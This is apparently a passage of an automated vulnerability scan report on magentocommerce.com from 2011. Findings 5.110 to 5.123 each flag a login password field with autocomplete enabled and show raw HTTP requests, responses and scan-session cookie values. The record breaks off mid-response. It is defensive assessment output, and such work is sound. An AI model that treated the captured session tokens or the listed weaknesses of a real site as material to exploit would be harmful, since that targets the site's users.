Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Fsolution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:14 GMT
Content-Length: 39161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.110. http://www.magentocommerce.com/partners/view/117/gorilla  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/view/117/gorilla

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partners/view/117/gorilla HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176374; expires=Sat, 11-Aug-2012 15:12:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fpartners%2Fview%2F117%2Fgorilla%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:54 GMT
Content-Length: 57995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.111. http://www.magentocommerce.com/pl  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pl

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pl HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176513; expires=Sat, 11-Aug-2012 15:15:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fpl%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:13 GMT
Content-Length: 70432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.112. http://www.magentocommerce.com/product/community-edition  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/community-edition

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/community-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Fcommunity-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 32482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.113. http://www.magentocommerce.com/product/compare  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/compare

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/compare HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175710; expires=Sat, 11-Aug-2012 15:01:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fproduct%2Fcompare%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:50 GMT
Content-Length: 47177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.114. http://www.magentocommerce.com/product/deployed-solutions  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/deployed-solutions

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/deployed-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175705; expires=Sat, 11-Aug-2012 15:01:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:45 GMT
Content-Length: 32561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.115. http://www.magentocommerce.com/product/emerging-business  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/emerging-business

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/emerging-business HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_activity=1313170894; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.2.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171056; expires=Sat, 11-Aug-2012 13:44:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:16 GMT
Content-Length: 33707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.116. http://www.magentocommerce.com/product/enterprise-community-faqs  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-community-faqs

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/enterprise-community-faqs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175681; expires=Sat, 11-Aug-2012 15:01:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fproduct%2Fenterprise-community-faqs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:21 GMT
Content-Length: 42996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.117. http://www.magentocommerce.com/product/enterprise-edition  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-edition

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:00:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175633; expires=Sat, 11-Aug-2012 15:00:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:00:33 GMT
Content-Length: 37947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.118. http://www.magentocommerce.com/product/enterprise-level  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-level

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/enterprise-level HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; exp_domain=magentocommerce.com; exp_last_visit=997810832; exp_last_activity=1313170832; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.1.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894; homepage_intro=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 32647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.119. http://www.magentocommerce.com/product/faq  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/faq

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/faq HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175724; expires=Sat, 11-Aug-2012 15:02:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fproduct%2Ffaq%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:04 GMT
Content-Length: 38677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.120. http://www.magentocommerce.com/product/features  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/features

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/features HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fproduct%2Ffeatures%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 47349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.121. http://www.magentocommerce.com/product/hosted-solutions  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/hosted-solutions

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/hosted-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175686; expires=Sat, 11-Aug-2012 15:01:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fhosted-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:26 GMT
Content-Length: 32763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.122. http://www.magentocommerce.com/product/magento-go  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-go

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/magento-go HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175671; expires=Sat, 11-Aug-2012 15:01:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fproduct%2Fmagento-go%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:11 GMT
Content-Length: 36074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.123. http://www.magentocommerce.com/product/magento-zend  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-zend

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/magento-zend HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
